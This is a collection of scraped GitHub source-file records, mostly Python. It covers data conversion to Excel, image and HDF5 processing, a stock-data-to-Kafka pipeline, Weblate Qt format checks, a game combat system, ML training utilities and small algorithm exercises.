\r\n low_limit=low_limit+points+1\r\n pt=points\r\n worksheet.write_column(1, 12, Press_ratio_arr)\r\n worksheet.write_column(1, 13, Mass_flow_arr) \r\n worksheet.write_column(1, 14, Efficiency_arr)\r\n with open(text) as k:\r\n if 'Surge Line' in k.read():\r\n # writing surge line\r\n print(\"\\nAdding Surge points\")\r\n p=3+Number_of_speed_lines+(points*Number_of_speed_lines)\r\n q=number_of_lines\r\n Pts_updat=0\r\n for num2 in range(p, q):\r\n line =result[num2]\r\n file_input = line.split()\r\n Press_ratio_surge=float(file_input[1])\r\n print(\"Press_ratio:\", Press_ratio_surge)\r\n Mass_flow_surge=float(file_input[2])\r\n print(\"Mass_flow:\", Mass_flow_surge)\r\n Efficiency_surge=float(file_input[3])\r\n print(\"Efficiency:\", Efficiency_surge)\r\n worksheet.write(Pts_updat+1, 15, Press_ratio_surge)\r\n worksheet.write(Pts_updat+1, 16, Mass_flow_surge) \r\n worksheet.write(Pts_updat+1, 17, Efficiency_surge)\r\n #Updating the points \r\n Pts_updat=Pts_updat + points\r\n else:\r\n print(\"\\nNo Surge points\")\r\n Pts_updat=0\r\n for num2 in range(0, Number_of_speed_lines):\r\n line =result[num2] \r\n worksheet.write(Pts_updat+1, 15, 'null')\r\n worksheet.write(Pts_updat+1, 16, 'null') \r\n worksheet.write(Pts_updat+1, 17, 'null')\r\n #Updating the points\r\n Pts_updat=Pts_updat + points \r\n \r\n workbook.close() \r\n \r\n \r\n \r\n","repo_name":"agakshay/Dataprocessing--Text-to-excel-data-","sub_path":"Data_conversion.py","file_name":"Data_conversion.py","file_ext":"py","file_size_in_byte":12654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4440529640","text":"import glob\nimport h5py\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport sys,os\nfrom scipy.ndimage.morphology import grey_opening\nimport scipy as sp\n\n\nflist = glob.glob('/home/rjonnal/data/Dropbox/Share/2g_aooct_data/Data/2016.04.12_2/*.hdf5')\n\n\nfor f in flist:\n h5 = h5py.File(f)\n offset_matrix = h5['model/z_offsets'][:]\n goodness_matrix = h5['model/z_offset_goodness'][:]\n\n om = offset_matrix[0,:,:]\n oms = grey_opening(om,(1,15))\n\n\n mode = sp.stats.mode(oms.ravel())[0][0]\n mask = np.zeros(oms.shape)\n lower_threshold = np.mean(oms)-2.0*np.std(oms)\n upper_threshold = np.mean(oms)+2.0*np.std(oms)\n cond = np.logical_and(foffset_matrix>lower_threshold,foffset_matrix= b:\n resto = a%b\n while resto != 0:\n a = b\n b = resto\n resto = a%b\n return b\n else:\n resto = b%a\n while resto != 0:\n b = a\n a = resto\n resto = b%a\n return a\n\n\n#a = int(input(\"Digite o primeiro valor: \"))\n#b = int(input(\"Digite o segundo valor: \"))\n#print(calcula_mdc(a,b))","repo_name":"VitorLorente/LP2_2s2017","sub_path":"lista_dicionario/ex01.py","file_name":"ex01.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19074971520","text":"from envs.env import ArmEnv\nfrom algorithms.pd.PD import PD\nfrom algorithms.pd.pd_controller import learn\nimport numpy as np\n\n# set env\nenv = ArmEnv()\n\n# parameters\nalgorithm_name = 'pd'\ndata_path = './Data/'\nmodel_path = './model/' + algorithm_name + \"/\"\n\n\"\"\"parameters for running\"\"\"\nnb_epochs = 50\nnb_epoch_cycles = 50\nnb_rollout_steps = 300\n\nfile_name = 'Single_pos'+'_epochs_' + str(nb_epochs)\\\n + \"_episodes_\" + str(nb_epoch_cycles) + \\\n \"_rollout_steps_\" + str(nb_rollout_steps)\n\ndata_path_reward = data_path + algorithm_name + \"/\" + file_name + 'reward'\ndata_path_steps = data_path + algorithm_name + \"/\" + file_name + 'steps'\ndata_path_states = data_path + algorithm_name + \"/\" + file_name + 'states'\ndata_path_times = data_path + algorithm_name + \"/\" + file_name + 'times'\n\nmodel_name = file_name + 'model'\n\nsteps = []\n\n\ndef train():\n\n if algorithm_name == 'ddpg':\n from algorithms.ddpg.ddpg import learn\n learn(network='mlp',\n env=env,\n noise_type='normal_0.2',\n restore=False,\n nb_epochs=nb_epochs,\n nb_epoch_cycles=nb_epoch_cycles,\n nb_train_steps=60,\n nb_rollout_steps=nb_rollout_steps,\n data_path_reward=data_path_reward,\n data_path_steps=data_path_steps,\n data_path_states=data_path_states,\n data_path_times=data_path_times,\n model_path=model_path,\n model_name=model_name,\n )\n\n if algorithm_name == 'pd':\n from algorithms.pd.pd_controller import learn\n learn(\n controller=PD,\n env=env,\n nb_epochs=nb_epochs,\n nb_epoch_cycles=nb_epoch_cycles,\n nb_rollout_steps=nb_rollout_steps,\n data_path_reward=data_path_reward,\n data_path_steps=data_path_steps,\n data_path_states=data_path_states,\n data_path_times=data_path_times,\n )\n\n # if algorithm_name == 'ppo1'\n\n\nif __name__ == '__main__':\n train()","repo_name":"DengYuelin/RL_assembly","sub_path":"run_this.py","file_name":"run_this.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"184825900","text":"\"\"\"\nIDX file parser.\n\"\"\"\nimport struct\n\nimport numpy as np\n\n\ndef parse(path):\n \"\"\"\n Parses an IDX file to a numpy ndarray.\n\n NOTE: Performs no error checks whatsoever.\n\n :param path: Path to the idx file.\n :return: Numpy ndarray.\n \"\"\"\n data_types = {\n 0x08: np.uint8, # Unsigned byte\n 0x09: np.int8, # Signed byte\n 0x0B: np.int16, # Short\n 0x0C: np.int32, # Int\n 0x0D: np.float32, # Float\n 0x0E: np.float64, # Double\n }\n with open(path, 'rb') as file:\n file.read(2) # The first two bytes are always zero.\n data_type, dimensions = struct.unpack('BB', file.read(2))\n # The data is in big-endian order.\n dimension_sizes = struct.unpack('>{}'.format('I' * dimensions), file.read(dimensions * 4))\n data = np.fromfile(file, dtype=np.dtype(data_types[data_type]).newbyteorder('>'))\n return data.reshape(dimension_sizes)\n","repo_name":"fredrik-rose/ArtificialNeuralNetwork","sub_path":"artificialneuralnetwork/input/idxparser.py","file_name":"idxparser.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10293313274","text":"import re\n\nfrom django.utils.translation import gettext_lazy\n\nfrom weblate.checks.format import BaseFormatCheck\n\nQT_FORMAT_MATCH = re.compile(\n r\"\"\"\n %( # initial %\n L? # optional localized representation of numbers\n (?P\\d{1,2}) # variable order, like %1\n )\"\"\",\n re.VERBOSE,\n)\n\nQT_PLURAL_MATCH = re.compile(\n r\"\"\"\n %( # initial %\n L? # optional localized representation of numbers\n (?Pn) # plural: %n\n )\"\"\",\n re.VERBOSE,\n)\n\n\nclass QtFormatCheck(BaseFormatCheck):\n \"\"\"Check for Qt format string.\"\"\"\n\n check_id = \"qt_format\"\n name = gettext_lazy(\"Qt format\")\n description = gettext_lazy(\"Qt format string does not match source\")\n regexp = QT_FORMAT_MATCH\n\n def is_position_based(self, string):\n # everything is numbered\n return False\n\n\nclass QtPluralCheck(BaseFormatCheck):\n \"\"\"Check for Qt plural string.\"\"\"\n\n check_id = \"qt_plural_format\"\n name = gettext_lazy(\"Qt plural format\")\n description = gettext_lazy(\"Qt plural format string does not match source\")\n regexp = QT_PLURAL_MATCH\n\n def is_position_based(self, string):\n return True\n","repo_name":"WeblateOrg/weblate","sub_path":"weblate/checks/qt.py","file_name":"qt.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":3905,"dataset":"github-code","pt":"52"} +{"seq_id":"73804434404","text":"def sequentialDigits(low, high):\n result = set()\n def helper(temp, remaining):\n if temp:\n if (low <= int(temp) <= high):\n result.add(int(temp))\n elif (int(temp) > high):\n return\n\n for i in range(len(remaining)):\n if (not temp or remaining[i]-int(temp[-1])==1):\n helper(temp+str(remaining[i]), remaining[i+1:])\n\n helper(\"\", [i for i in range(10)])\n return (sorted(result))\n\nlow = 1000\nhigh = 12000\nprint(sequentialDigits(low, high))","repo_name":"tanjingjing123/LeetcodeAlgorithms","sub_path":"sequentialDigits.py","file_name":"sequentialDigits.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43621148798","text":"import io\nfrom PIL import Image\nfrom PIL import ImageChops\n\nRESULT_PERFECT_MATCH = 1\nRESULT_MATCH_WITHIN_TOLERANCE = 2\nRESULT_REGRESSION_FOUND = 3\nRESULT_RUN_INCOMPLETE = 4\n\n_RESULT_NAMES = {\n RESULT_PERFECT_MATCH: \"RESULT_PERFECT_MATCH\",\n RESULT_REGRESSION_FOUND: \"RESULT_REGRESSION_FOUND\",\n RESULT_MATCH_WITHIN_TOLERANCE: \"RESULT_MATCH_WITHIN_TOLERANCE\",\n RESULT_RUN_INCOMPLETE: \"RESULT_RUN_INCOMPLETE\"\n}\n\n\ndef check_diff(baseline_img, test_img):\n diffimg = ImageChops.difference(baseline_img, test_img)\n dbytes = diffimg.tobytes() # Converted to RGB earlier, default is raw encoding with 3Bpp.\n diffcount = 0\n for i in range(diffimg.height * diffimg.width):\n r, g, b = dbytes[i * 3], dbytes[i * 3 + 1], dbytes[i * 3 + 2]\n if r + g + b != 0:\n diffcount += 1\n return diffcount\n\nclass VisualReport(object):\n \"\"\"A report of a single visual regression test case.\"\"\"\n def __init__(self, config, baseline_screenshot, test_screenshot):\n if baseline_screenshot is None or test_screenshot is None:\n self.result = RESULT_RUN_INCOMPLETE\n return\n bimg = Image.open(baseline_screenshot).convert('RGB')\n timg = Image.open(test_screenshot).convert('RGB')\n diffcount = check_diff(bimg, timg)\n self.diff_percentage = diffcount * 100.0 / bimg.width / bimg.height\n if self.diff_percentage == 0.0:\n self.result = RESULT_PERFECT_MATCH\n elif self.diff_percentage < config.environment.max_diff_percentage:\n self.result = RESULT_MATCH_WITHIN_TOLERANCE\n else:\n self.result = RESULT_REGRESSION_FOUND \n self.diff_percentage = diffcount * 100.0 / bimg.width / bimg.height\n \n def to_dict(self):\n return {\n \"result\": _RESULT_NAMES[self.result],\n \"diff_percentage\": \"%0.2f\" % self.diff_percentage\n }\n \n def __str__(self):\n return str(self.to_dict())\n","repo_name":"saisuman/viregtest","sub_path":"visual.py","file_name":"visual.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71464332964","text":"from django.conf.urls import url\n\nfrom tastypie import fields\nfrom tastypie.authorization import Authorization\nfrom tastypie.resources import ModelResource, Resource, ALL, ALL_WITH_RELATIONS\n\nfrom ceeq.apps.queries.models import Project\nfrom ceeq.apps.calculator.models import ComponentImpact\n\n\nclass ComponentImpactResource(ModelResource):\n class Meta:\n queryset = ComponentImpact.objects.all()\n resource_name = 'componentImpact'\n authorization = Authorization()\n allowed_methods = ['get', 'post', 'put', 'delete']\n\n\nclass SearchAutoCompleteResource(Resource):\n def obj_get(self, bundle, **kwargs):\n project_names = Project.objects.all().values_list('name', flat=True)\n results = []\n for name in project_names:\n results.append(name)\n\n results.sort()\n return results\n\n def dehydrate(self, bundle):\n # for jquery autocomplete\n if 'term' in bundle.request.GET:\n term = bundle.request.GET['term']\n filtered_results = []\n for name in bundle.obj:\n if name.startswith(term) or name.lower().startswith(term):\n filtered_results.append(name)\n return filtered_results\n else:\n return bundle.obj\n\n class Meta:\n resource_name = 'searchAutoComplete'\n authorization = Authorization()\n allowed_method = ['get']\n\n def prepend_urls(self):\n return [\n url(r\"^(?P%s)/$\" % self._meta.resource_name, self.wrap_view('dispatch_detail'), name=\"api_dispatch_detail\"),\n ]\n","repo_name":"jlpcri/ceeq","sub_path":"ceeq/api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"4443765527","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDescription: This script fetches the stock information from Alpha Vantage site using the TimeSeries API\n The data is then sent as json records to Kafka topics. \nPrequisites: Ensure Kafka brokers are running and the parameters passed correctly.\nUsage: python RetrieveStockDataSentToKafka.py --apikey [--interval ] [--kafkabootstrapserver ] [--kafkatopic ] \n@author: Shyamal Akruvala\n\"\"\"\nfrom alpha_vantage.timeseries import TimeSeries\nimport time, json, argparse, sys, os\nimport pandas as pd\nfrom kafka import KafkaProducer\n\nparser = argparse.ArgumentParser(description='Stock Data Fetching Program')\nparser.add_argument('--apikey', dest='apikey', type=str, required=True, help='API Key from Alpha Vantage')\nparser.add_argument('--interval', dest='interval', type=int, required=False, help='Interval in seconds between API calls')\nparser.add_argument('--kafkabootstrapserver', dest='kafkabootstrapserver', type=str, required=False, help='Kafka Bootstrap Server details and port')\nparser.add_argument('--kafkatopic', dest='kafkatopic', type=str, required=False, help='Kafka topic to send the data')\n\nparser.set_defaults(interval=100, kafkabootstrapserver='localhost:9092', kafkatopic='stocks')\nargs = parser.parse_args()\n\n# Create a TimeSeries object to fetch data via API call. Please visit Alpha Vantage to get your API Key (https://www.alphavantage.co/support/#api-key)\n# Check documentation on https://alpha-vantage.readthedocs.io/en/latest/index.html to understand the various output_formats \nts = TimeSeries(key=args.apikey, output_format='pandas')\n\ndef fetchStockData(ticker):\n \"\"\"\n This method takes a string as an input and fetches data from Alpha Vantage site for the same ticker name\n e.g. MSFT for Microsoft\n \"\"\"\n data, meta_data = ts.get_intraday(symbol=ticker, interval='1min', outputsize='compact') # compact outputsize to get latest 100 records\n print(\"Data fetched for ticker:\" + ticker)\n data = data[:1] # Taking the first row only for analysis and processing\n data['ticker'] = ticker # adding the ticker details to the dataframe\n data = data.reset_index()\n data['date'] = (data['date'] - pd.Timestamp(\"1970-01-01\")) // pd.Timedelta('1s') # converting the datetime to epoch timestamp \n data = data.rename(columns = {'date':'timestamp',\n '1. open':'open',\n '2. high':'high',\n '3. low':'low',\n '4. close':'close',\n '5. volume':'volume'\n }) # renaming the columns for simplicity\n cols = ['ticker','timestamp','open','high','low','close','volume']\n data = data.reindex(columns=cols) # rearranging the columns\n #print(data)\n #return data.to_json(orient='columns', date_format='iso')\n return data.to_dict(orient='list')\n\n\nprint(\" _____ _ _ _____ _ _____ _ ______ _ _ \")\nprint(\" / ____| | | | | __ \\ (_) | __ \\ | | | ____| | | | | \")\nprint(\" | (___ | |_ ___ ___| | __ | |__) | __ _ ___ ___ | | | | __ _| |_ __ _ | |__ ___| |_ ___| |__ \")\nprint(\" \\___ \\| __/ _ \\ / __| |/ / | ___/ '__| |/ __/ _ \\ | | | |/ _` | __/ _` | | __/ _ \\ __/ __| '_ \\ \")\nprint(\" ____) | || (_) | (__| < | | | | | | (_| __/ | |__| | (_| | || (_| | | | | __/ || (__| | | |\")\nprint(\" |_____/ \\__\\___/ \\___|_|\\_\\ |_| |_| |_|\\___\\___| |_____/ \\__,_|\\__\\__,_| |_| \\___|\\__\\___|_| |_|\")\n \nif __name__ == \"__main__\":\n \"\"\"\n This is the main method.\n \"\"\"\n try:\n while True: # This constructs an infinite loop. The script will keep executing and fetching the stock data until interrupted.\n print(\"Retrieving stock information from site.....\")\n print(\"###########################################\")\n \n # Initialize the Kafka Producer\n kProducer = KafkaProducer(\n bootstrap_servers=[args.kafkabootstrapserver],\n value_serializer=lambda v: json.dumps(v).encode('utf-8'))\n\n # Below is the list of stock tickers for which stock information would be fetched.\n stockTickerList = ['CTSH', 'MSFT', 'GOOGL']\n \n for ticker in stockTickerList:\n stockInfoDF = fetchStockData(ticker)\n #print(stockInfoDF)\n for k,v in stockInfoDF.items():\n stockInfoDF[k] = str(stockInfoDF[k]).replace('[','').replace(']','').replace(\"'\",'') # remove brackets and quotes\n if stockInfoDF is not None:\n kProducer.send(args.kafkatopic, stockInfoDF)\n\n print(\"Script going to sleep for \" + str(args.interval) + \" seconds\")\n time.sleep(args.interval)\n print(\"###########################################\")\n except KeyboardInterrupt:\n print('''Program execution interrupted. Good Bye and have a nice day''')\n try:\n sys.exit(0)\n except SystemExit:\n os._exit(0)","repo_name":"Shyamal002/PySpark_Kafka_Stock_Data_Analysis","sub_path":"RetrieveStockDataToKafka.py","file_name":"RetrieveStockDataToKafka.py","file_ext":"py","file_size_in_byte":5255,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"32759192601","text":"import pygame as pg\nimport numpy as np\nfrom src.combat.abilities import ALL_ABILITIES, ActiveAbility\nfrom src.combat.status_effects import BASE_CD, DOT_EFFECTS\n\nfrom math import sin, cos, atan2\n\nclass CombatSystem:\n def __init__(self, entities, camera):\n self.camera = camera\n self.entities = entities\n \n def update(self, entities, camera):\n self.camera = camera\n self.entities = entities\n self.status_effect_cds()\n self.active_abilities()\n self.collide()\n \n def use_ability(self, abl_input):\n a_i = abl_input['ability']\n index = abl_input['i']\n input_angle = abl_input['angle']\n # no input \n if a_i==-1:\n return\n \n # prevent spamming\n if 'ability_lock' in self.entities.status_effects[index]['effects']:\n return\n \n # entity is stunned cannot use abilities\n if 'stunned' in self.entities.status_effects[index]['effects']:\n return\n\n # all abilities\n queued_ability = a_i\n\n # abilities with movement tag\n if 'movement' in ALL_ABILITIES[queued_ability]['type']:\n # get the direction of the movement\n x_dir = cos(input_angle)\n y_dir = sin(input_angle)\n x_dir, y_dir = self.camera.screen_to_world(x_dir, y_dir)\n angle = atan2(y_dir, x_dir)\n spd_mod = 3+(self.entities.stats[index]['mbl']+self.entities.stats[index]['pwr'])/100\n self.entities.vel[index][0] = spd_mod*self.entities.spd[index]*cos(angle)\n self.entities.vel[index][1] = spd_mod*self.entities.spd[index]*sin(angle)\n\n # update the entity hurt box to deal damage\n movement_hurt_box = []\n for part in self.entities.creature[index].skeleton:\n movement_hurt_box.append([part[0], part[1], part[2]])\n \n self.entities.hurt_box[index] = ActiveAbility('movement', movement_hurt_box, \n ALL_ABILITIES[queued_ability]['modifiers'],\n 2*self.entities.creature[index].size)\n\n # consume energy to use ability\n energy_usage = 1/2*self.entities.creature[index].num_parts*(spd_mod*self.entities.spd[index])**2/1000\n self.entities.energy[index]-=energy_usage\n\n if 'strike' in ALL_ABILITIES[queued_ability]['type']:\n # get the strike direction\n x_dir = cos(input_angle)\n y_dir = sin(input_angle)\n x_dir, y_dir = self.camera.screen_to_world(x_dir, y_dir)\n angle = atan2(y_dir, x_dir)\n self.entities.vel[index][0] = self.entities.spd[index]*cos(angle)\n self.entities.vel[index][1] = self.entities.spd[index]*sin(angle)\n\n # update hurtboxes\n self.entities.hurt_box[index] = ActiveAbility('strike', [], \n ALL_ABILITIES[queued_ability]['modifiers'],\n 2*self.entities.creature[index].size)\n\n if 'aoe' in ALL_ABILITIES[queued_ability]['type']:\n self.aoe_collide(index, \n self.entities.entity_calculation(index, 'intimidation'),\n ALL_ABILITIES[queued_ability])\n \n toggled = []\n if 'toggle' in ALL_ABILITIES[queued_ability]['type']:\n for toggle in ALL_ABILITIES[queued_ability]['side_effects']:\n for j in range(len(self.entities.status_effects[index]['effects'])-1, -1, -1):\n if self.entities.status_effects[index]['effects'][j] == toggle:\n toggled.append(toggle)\n self.entities.status_effects[index]['effects'][j:j+1] = []\n self.entities.status_effects[index]['cd'][j:j+1] = []\n self.entities.status_effects[index]['time'][j:j+1] = []\n self.entities.status_effects[index]['source'][j:j+1] = []\n\n\n for side_effect in ALL_ABILITIES[queued_ability]['side_effects']:\n if side_effect not in toggled:\n self.apply_status(index, index, side_effect, pg.time.get_ticks())\n\n def collide(self):\n for source in range(len(self.entities.hurt_box)):\n self.hurtbox_collide(source)\n \n def aoe_collide(self, source, aoe, ability):\n for target in range(len(self.entities.pos)):\n time = pg.time.get_ticks()\n if target!=source:\n dx = self.entities.pos[source][0]-self.entities.pos[target][0]\n dy = self.entities.pos[source][1]-self.entities.pos[target][1]\n if dx**2+dy**2<=aoe**2:\n for mod in ability['modifiers']:\n self.apply_status(source, target, mod, time)\n\n def hurtbox_collide(self, source):\n if self.entities.hurt_box[source]:\n time = pg.time.get_ticks()\n for target in range(len(self.entities.creature)):\n if source!=target and self.entities.creature[target].collide(self.entities.hurt_box[source].get_pos()):\n # decrease hp\n self.take_damage(target, 0)\n # apply modifiers\n for modifier in self.entities.hurt_box[source].modifiers:\n self.apply_status(source, target, modifier, time)\n # increase the target's aggression score against the attacker\n self.entities.behaviours[target].aggression[source]+=0.1\n\n def take_damage(self, target, dmg):\n self.entities.health[target] -= dmg \n\n def dot_status(self):\n for i in range(len(self.entities.status_effects)):\n for dot in DOT_EFFECTS:\n if dot in self.entities.status_effects[i]['effects']:\n self.take_damage(i, 0)\n print(f'{i} took dot damage')\n\n def apply_status(self, source, target, effect, time):\n if effect in self.entities.status_effects[target]['effects']:\n return\n self.entities.status_effects[target]['effects'].append(effect)\n self.entities.status_effects[target]['cd'].append(BASE_CD)\n self.entities.status_effects[target]['time'].append(time)\n self.entities.status_effects[target]['source'].append(source)\n \n def status_effect_cds(self):\n # entity loop\n for i in range(len(self.entities.status_effects)):\n if self.entities.status_effects[i]['effects']:\n # status loop\n num_effects = len(self.entities.status_effects[i]['effects'])\n for j in range(num_effects):\n effect = self.entities.status_effects[i]['effects'][0]\n cd = self.entities.status_effects[i]['cd'][0]\n time = self.entities.status_effects[i]['time'][0]\n source = self.entities.status_effects[i]['source'][0]\n\n self.entities.status_effects[i]['effects'][0:1] = []\n self.entities.status_effects[i]['cd'][0:1] = []\n self.entities.status_effects[i]['time'][0:1] = []\n self.entities.status_effects[i]['source'][0:1] = []\n if pg.time.get_ticks()-time= 0.\n mode paramater is ignored\n Default: None\n scale_mode (str): {'cycle', 'iterations'}.\n Defines whether scale_fn is evaluated on\n cycle number or cycle iterations (training\n iterations since start of cycle).\n Default: 'cycle'\n last_batch_iteration (int): The index of the last batch. Default: -1\n Example:\n >>> optimizer = torch.optim.SGD(model.parameters(), lr=0.1, momentum=0.9)\n >>> scheduler = torch.optim.CyclicLR(optimizer)\n >>> data_loader = torch.utils.data.DataLoader(...)\n >>> for epoch in range(10):\n >>> for batch in data_loader:\n >>> scheduler.batch_step()\n >>> train_batch(...)\n .. _Cyclical Learning Rates for Training Neural Networks: https://arxiv.org/abs/1506.01186\n .. _bckenstler/CLR: https://github.com/bckenstler/CLR\n \"\"\"\n\n def __init__(self, optimizer, base_lr=1e-3, max_lr=6e-3,\n step_size=2000, mode='triangular', gamma=1.,\n scale_fn=None, scale_mode='cycle', last_batch_iteration=-1):\n\n if not isinstance(optimizer, Optimizer):\n raise TypeError('{} is not an Optimizer'.format(\n type(optimizer).__name__))\n self.optimizer = optimizer\n\n if isinstance(base_lr, list) or isinstance(base_lr, tuple):\n if len(base_lr) != len(optimizer.param_groups):\n raise ValueError(\"expected {} base_lr, got {}\".format(\n len(optimizer.param_groups), len(base_lr)))\n self.base_lrs = list(base_lr)\n else:\n self.base_lrs = [base_lr] * len(optimizer.param_groups)\n\n if isinstance(max_lr, list) or isinstance(max_lr, tuple):\n if len(max_lr) != len(optimizer.param_groups):\n raise ValueError(\"expected {} max_lr, got {}\".format(\n len(optimizer.param_groups), len(max_lr)))\n self.max_lrs = list(max_lr)\n else:\n self.max_lrs = [max_lr] * len(optimizer.param_groups)\n\n self.step_size = step_size\n\n if mode not in ['triangular', 'triangular2', 'exp_range'] \\\n and scale_fn is None:\n raise ValueError('mode is invalid and scale_fn is None')\n\n self.mode = mode\n self.gamma = gamma\n\n if scale_fn is None:\n if self.mode == 'triangular':\n self.scale_fn = self._triangular_scale_fn\n self.scale_mode = 'cycle'\n elif self.mode == 'triangular2':\n self.scale_fn = self._triangular2_scale_fn\n self.scale_mode = 'cycle'\n elif self.mode == 'exp_range':\n self.scale_fn = self._exp_range_scale_fn\n self.scale_mode = 'iterations'\n else:\n self.scale_fn = scale_fn\n self.scale_mode = scale_mode\n\n self.batch_step(last_batch_iteration + 1)\n self.last_batch_iteration = last_batch_iteration\n\n def batch_step(self, batch_iteration=None):\n if batch_iteration is None:\n batch_iteration = self.last_batch_iteration + 1\n self.last_batch_iteration = batch_iteration\n for param_group, lr in zip(self.optimizer.param_groups, self.get_lr()):\n param_group['lr'] = lr\n\n def _triangular_scale_fn(self, x):\n return 1.\n\n def _triangular2_scale_fn(self, x):\n return 1 / (2. ** (x - 1))\n\n def _exp_range_scale_fn(self, x):\n return self.gamma**(x)\n\n def get_lr(self):\n step_size = float(self.step_size)\n cycle = np.floor(1 + self.last_batch_iteration / (2 * step_size))\n x = np.abs(self.last_batch_iteration / step_size - 2 * cycle + 1)\n\n lrs = []\n param_lrs = zip(self.optimizer.param_groups, self.base_lrs, self.max_lrs)\n for param_group, base_lr, max_lr in param_lrs:\n base_height = (max_lr - base_lr) * np.maximum(0, (1 - x))\n if self.scale_mode == 'cycle':\n lr = base_lr + base_height * self.scale_fn(cycle)\n else:\n lr = base_lr + base_height * self.scale_fn(self.last_batch_iteration)\n lrs.append(lr)\n return lrs\n\ndef write_log(logfile, train_loss, test_loss, test_score, lr):\n with open(logfile, \"a+\") as log:\n log.write(\"{}\\t{}\\t{}\\t{}\\n\".format(train_loss, test_loss, test_score, lr))\n \n \n \ndef aug_train(p=1): \n return Compose([Resize(224, 224), \n HorizontalFlip(), \n VerticalFlip(), \n RandomRotate90(), \n Transpose(), \n ShiftScaleRotate(shift_limit=0.0625, scale_limit=0.50, rotate_limit=45, p=.75),\n OpticalDistortion(),\n GridDistortion(), \n RandomBrightnessContrast(p=0.3), \n RandomGamma(p=0.3), \n OneOf([HueSaturationValue(hue_shift_limit=20, sat_shift_limit=0.1, val_shift_limit=0.1, p=0.3), \n ChannelShuffle(p=0.3), CLAHE(p=0.3)])], p=p)\ndef aug_val(p=1):\n return Compose([\n Resize(224, 224)\n ], p=p)\n\n\nclass DataGenerator(data.Dataset):\n \"\"\"Generates dataset for loading.\n Args:\n ids: images ids\n labels: labels of images (1/0)\n augment: image augmentation from albumentations\n imdir: path tpo folder with images\n \"\"\"\n def __init__(self, ids, labels, augment, imdir):\n 'Initialization'\n self.ids, self.labels = ids, labels\n self.augment = augment\n self.imdir = imdir\n \n def __len__(self):\n return len(self.ids) \n\n def __getitem__(self, idx):\n imid = self.ids[idx]\n y = self.labels[idx]\n X = self.__load_image(imid)\n return X, np.expand_dims(y,0)\n\n def __load_image(self, imid):\n imid = imid+'.tif'\n im = imread(os.path.join(self.imdir, imid))\n if self.augment!=None:\n augmented = self.augment(image=im)\n im = augmented['image']\n im = im/255.0\n im = np.rollaxis(im, -1)\n return im \n \n \ndef make_tta(image):\n '''\n return 4 pictures - original, 3*90 rotations, mirror\n '''\n image_tta = np.zeros((4, image.shape[0], image.shape[1], 3))\n image_tta[0] = image\n aug = HorizontalFlip(p=1)\n image_aug = aug(image=image)['image']\n image_tta[1] = image_aug\n aug = VerticalFlip(p=1)\n image_aug = aug(image=image)['image']\n image_tta[2] = image_aug\n aug = Transpose(p=1)\n image_aug = aug(image=image)['image']\n image_tta[3] = image_aug \n image_tta = np.rollaxis(image_tta, -1, 1)\n return image_tta\ndef aug_train_heavy(p=1):\n return Compose([HorizontalFlip(), VerticalFlip(), RandomRotate90(), Transpose(), RandomBrightnessContrast(p=0.3), RandomGamma(p=0.3), OneOf([HueSaturationValue(hue_shift_limit=20, sat_shift_limit=0.1, val_shift_limit=0.1, p=0.3), ChannelShuffle(p=0.3)])], p=p)\nheavy_tta = aug_train_heavy()\n\ndef make_tta_heavy(image, n_images=12):\n image_tta = np.zeros((n_images, image.shape[0], image.shape[1], 3))\n image_tta[0] = image/255.0\n for i in range(1,n_images):\n image_aug = heavy_tta(image=image)['image']\n image_tta[i] = image_aug/255.0\n image_tta = np.rollaxis(image_tta, -1, 1)\n return image_tta ","repo_name":"azkalot1/Histopathologic-Cancer-Detection","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":14633,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"42069247533","text":"def calculateSlantHeight(radius: int, height: int):\n slantHeight = (radius ** 2 + height ** 2) ** (1/2)\n return slantHeight\n\n\ndef calculateVolume(radius: int, height: int):\n volume = (22/7) * (radius ** 2) * (height / 3)\n return volume\n\n\ndef curvedSurfaceArea(radius: int, height: int):\n area = (22/7) * radius * calculateSlantHeight(radius, height)\n return area\n\n\ndef totalSurfaceArea(radius: int, height: int):\n area = curvedSurfaceArea(radius, height) + (22/7) * (radius ** 2)\n return area\n\n\nmenuMain = {\n 1: 'Calculate Slant Height(l) of the Cone',\n 2: 'Calculate Volume of the Cone',\n 3: 'Calculate Curved Surface Area (CSA) of Cone',\n 4: 'Calculate Total Surface Area (TSA) of Cone'\n}\n\nwhile True:\n for i in menuMain.keys():\n print('{}: {}'.format(i, menuMain[i]))\n radius = int(input('Please enter the radius of the Cone '))\n height = int(input('Please enter the height of the Cone (Unit must be same as radius) '))\n unit = input('Please enter the unit of both the quantity ')\n mainChoice = int(input('Please enter your choice '))\n if mainChoice == 1:\n print('Slant Height of the Cone is: {} {}'.format(calculateSlantHeight(radius, height), unit))\n elif mainChoice == 2:\n print('Volume of the Cone is: {}'.format(calculateVolume(radius, height), unit))\n elif mainChoice == 3:\n print('CSA of the Cone is: {}'.format(curvedSurfaceArea(radius, height), unit))\n elif mainChoice == 4:\n print('TSA of the Cone is: {}'.format(totalSurfaceArea(radius, height), unit))\n userConfirmation = input('Do you want to continue (Y/N) ')\n if userConfirmation.lower == 'y':\n continue\n else:\n 